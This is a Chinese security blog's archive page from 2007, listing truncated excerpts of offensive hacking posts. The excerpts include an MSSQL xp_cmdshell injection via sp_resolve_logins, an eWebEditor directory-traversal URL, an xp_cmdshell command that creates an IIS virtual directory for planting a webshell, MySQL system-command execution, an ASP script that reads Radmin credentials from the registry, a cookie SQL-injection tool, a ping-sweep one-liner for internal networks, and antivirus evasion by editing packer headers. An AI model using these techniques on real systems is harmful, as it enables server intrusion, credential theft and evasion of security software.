上一页 1 2 3 4 5 6 7 8 9 ··· 23 下一页
  2007年11月11日
摘要: Neeao:此漏洞鸡肋之极,甚至没一点用处,不过重要的还是疯子锲而不舍的不断追求的这种精神。什么时候也能有空去读一些代码去。 我看到MSSQL的存储过程中,有模有样的在过滤。 然后我就去读读他们的存储过程。就找到了一个注入而已。 疯子如是说。 漏洞资料如下: master..sp_resolve_logins存储过程中,对@dest_path参数过滤不严,导致xp_cmdshell注入。 分... 阅读全文
posted @ 2007-11-11 01:49 %5C 阅读(471) 评论(0) 推荐(0) 编辑
  2007年11月4日
摘要: ewebeditor/admin_uploadfile.asp?id=14 在id=14后面添加&dir=.. 再加 &dir=../.. &dir=http://www.cnblogs.com/../.. 看到整个网站文件了 阅读全文
posted @ 2007-11-04 21:50 %5C 阅读(1120) 评论(1) 推荐(0) 编辑
摘要: 我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错: exec master.dbo.xp_cmdshell ’cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"’ 建立虚拟目... 阅读全文
posted @ 2007-11-04 18:52 %5C 阅读(587) 评论(0) 推荐(0) 编辑
  2007年9月28日
摘要: mysql5.x for linux下面有一个函数,可以帮助我们干很多事情,这个函数4。x下面貌似没,原来一直没发现,也没去查函数手册,就我自己的经验来写点东西。4,x的明天再看看函数手册,再装一个实验一下。 mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的范围内。 一般我们按照常规思路... 阅读全文
posted @ 2007-09-28 10:06 %5C 阅读(380) 评论(0) 推荐(0) 编辑
摘要: Radmin Reader ==> Bin ==> :) '========================================Main====================================== Set WSH= Server.CreateObject("WSCRIPT.SHELL") RadminPath="HKEY_LOCAL_MACHINE\SYSTEM... 阅读全文
posted @ 2007-09-28 10:03 %5C 阅读(457) 评论(0) 推荐(0) 编辑
摘要: 补充:实际上在网络安全这个世界里面,最NB应该的就是地下黑客.有无法想象,超级恐怖的实力.万事谨慎,几乎 感觉不到他们的存在. 1.拥有2台或更多目前pc顶端配置的pc. 2.有很多个硬盘或移动硬盘,并且大多数已经装满。 3.80%的时候使用silc,10%使用ssl irc,还有10%的时候使用msn,并且对msn上的好友说: 到silc来说.silc中的名字可能叫asdfd,ssl的名字可能... 阅读全文
posted @ 2007-09-28 10:02 %5C 阅读(682) 评论(0) 推荐(0) 编辑
  2007年9月26日
摘要: Asp+Mssql Cookie Sql Injection Tool Asp+Mssql Sql Cookie Injection Tool Beta 1 by Mika[EST] " method="POST"> Exploitable Url: " /> unspecified\n"?> Exploitable Cookie: " /> unspecified\n"... 阅读全文
posted @ 2007-09-26 19:23 %5C 阅读(955) 评论(0) 推荐(0) 编辑
摘要: 这两天在做渗透测试,进入内网后需要大致判断一下里面有哪些机器,不想再传文件上去,就想了这个办法: C:\WINNT\System32>for /L %I in (1,1,254) do @FOR /F "tokens=3 usebackq delims=: " %J IN (`ping -w 100 -n 1 192.168.0.%I^|findstr "Reply"`) DO @echo %J... 阅读全文
posted @ 2007-09-26 19:20 %5C 阅读(601) 评论(0) 推荐(0) 编辑
摘要: 简介:在众多反病毒产品中,卡巴斯基在用户口碑相当不错,很多用户都说卡巴司基的虚拟机脱壳技术很强。然而笔者仅仅对通用的“加壳”步骤进行了小小的调整,却有了惊人的发现——仅通过简单的壳头修改,卡巴大叔竟然无语了。 “小样,你以为你穿了马甲我就不认识你了?”这句台词耳熟能详。现在用户用这句话来形容反病毒厂商的脱壳技术。这项技术的产生与病毒程序编写者使用的“加壳”技术密切相关。 众所周知,所谓... 阅读全文
posted @ 2007-09-26 19:19 %5C 阅读(610) 评论(0) 推荐(0) 编辑
  2007年9月21日
摘要: 好久没发帖子了,嘿嘿~~~上班了,很少能上网了哦~~~~昨天俺回到家,学校领导给俺打电话说让俺帮忙检测一下学校新更新的网站安全做得怎么样,哎~~~虽然俺一百个不乐意但是领导的面子还是要给的嘛 结果,找了N久也没找到什么洞洞可以用的(PS:俺的水平本来就不怎么样嘛),给领导打电话汇报了一下,说什么花钱买的就是比自己做的好(PS:原来的是俺做的,安全性确实差了点,但俺要求用php写,领导非不让,结果用... 阅读全文
posted @ 2007-09-21 09:10 %5C 阅读(739) 评论(0) 推荐(0) 编辑
上一页 1 2 3 4 5 6 7 8 9 ··· 23 下一页